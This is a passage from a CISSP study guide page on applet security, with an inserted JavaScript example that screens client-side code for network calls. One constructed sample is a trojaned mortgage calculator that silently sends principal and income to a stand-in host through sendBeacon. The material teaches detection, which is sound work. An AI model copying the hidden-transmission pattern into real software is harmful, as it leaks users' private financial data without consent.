Page 582 - (ISC)² CISSP Certified Information Systems Security Professional Official Study Guide

itself. This provides a number of benefits to both the remote server
               and the end user:

                    The processing burden is shifted to the client, freeing up resources
                    on the web server to process requests from more users.

                    The client is able to produce data using local resources rather than
                    waiting for a response from the remote server. In many cases, this
                    results in a quicker response to changes in the input data.

                    In a properly programmed applet, the web server does not receive
                    any data provided to the applet as input, therefore maintaining the
                    security and privacy of the user’s financial data.

               However, just as with agents, applets introduce a number of security
               concerns. They allow a remote system to send code to the local system
               for execution. Security administrators must take steps to ensure that
               code sent to systems on their network is safe and properly screened for
               malicious activity. Also, unless the code is analyzed line by line, the
               end user can never be certain that the applet doesn’t contain a Trojan
               horse component. For example, the mortgage calculator might indeed
               transmit sensitive financial information to the web server without the
               end user’s knowledge or consent.
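
               The screening step described above can be sketched as a check that flags
               outbound-data APIs in client-side code before it is allowed to run. This is
               an added example, not code from the study guide; it uses browser JavaScript
               as a present-day stand-in for applet code, and the function names, sink list
               and both calculator samples are constructed for illustration.

```javascript
// Added example: heuristic screen for outbound-data APIs in client-side code.
// The sink list and all names below are assumptions made for illustration.
const NETWORK_SINKS = [
  { api: "fetch", re: /\bfetch\s*\(/ },
  { api: "XMLHttpRequest", re: /\bXMLHttpRequest\b/ },
  { api: "sendBeacon", re: /\bsendBeacon\s*\(/ },
  { api: "WebSocket", re: /\bWebSocket\b/ },
  { api: "EventSource", re: /\bEventSource\b/ },
  { api: "element.src assignment", re: /\.src\s*=[^=]/ },
  { api: "form submit", re: /\.submit\s*\(/ },
];

// Blank out comments (keeping newlines) so commented-out calls are not
// reported and line numbers stay accurate. "://" in URLs is left alone.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, m => m.replace(/[^\n]/g, " "))
            .replace(/(^|[^:])\/\/.*$/gm, "$1");
}

// Return one finding per (line, API) so a reviewer knows where to look.
function screenMobileCode(src) {
  const findings = [];
  stripComments(src).split("\n").forEach((text, i) => {
    for (const { api, re } of NETWORK_SINKS) {
      if (re.test(text)) findings.push({ line: i + 1, api });
    }
  });
  return findings;
}

// Constructed sample 1: calculator that only computes locally.
const cleanCalculator = `
function monthlyPayment(principal, annualRate, years) {
  const r = annualRate / 12, n = years * 12;
  // fetch() is never needed: all inputs stay in the browser
  return principal * r / (1 - Math.pow(1 + r, -n));
}`;

// Constructed sample 2: same calculator with a hidden transmission added.
const trojanedCalculator = `
function monthlyPayment(principal, annualRate, years, income) {
  const r = annualRate / 12, n = years * 12;
  navigator.sendBeacon("https://collector.example.invalid/c",
                       JSON.stringify({ principal, income }));
  return principal * r / (1 - Math.pow(1 + r, -n));
}`;
```

               Pattern matching of this kind only flags plainly written calls. Code that
               hides its network use still requires the line-by-line analysis the text
               describes.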

               Two historical examples of applet types are Java applets and ActiveX
               controls.

               Java Applets: Java is a platform-independent programming
               language developed by Sun Microsystems (now owned by Oracle).
               Java is largely superseded by modern applications, and it is no longer
               supported directly in most browsers. However, you should still have a
               basic understanding of Java as it may still be in use internally or
               supported in the specific browser implemented by your organization.
               While modern web design has moved away from Java, this does not
               mean Java has been scrubbed off the internet. Most programming
               languages use compilers that produce applications custom-tailored to
               run under a specific operating system. This requires the use of
               multiple compilers to produce different versions of a single application
               for each platform it must support. Java overcomes this limitation by
               inserting the Java Virtual Machine (JVM) into the picture. Each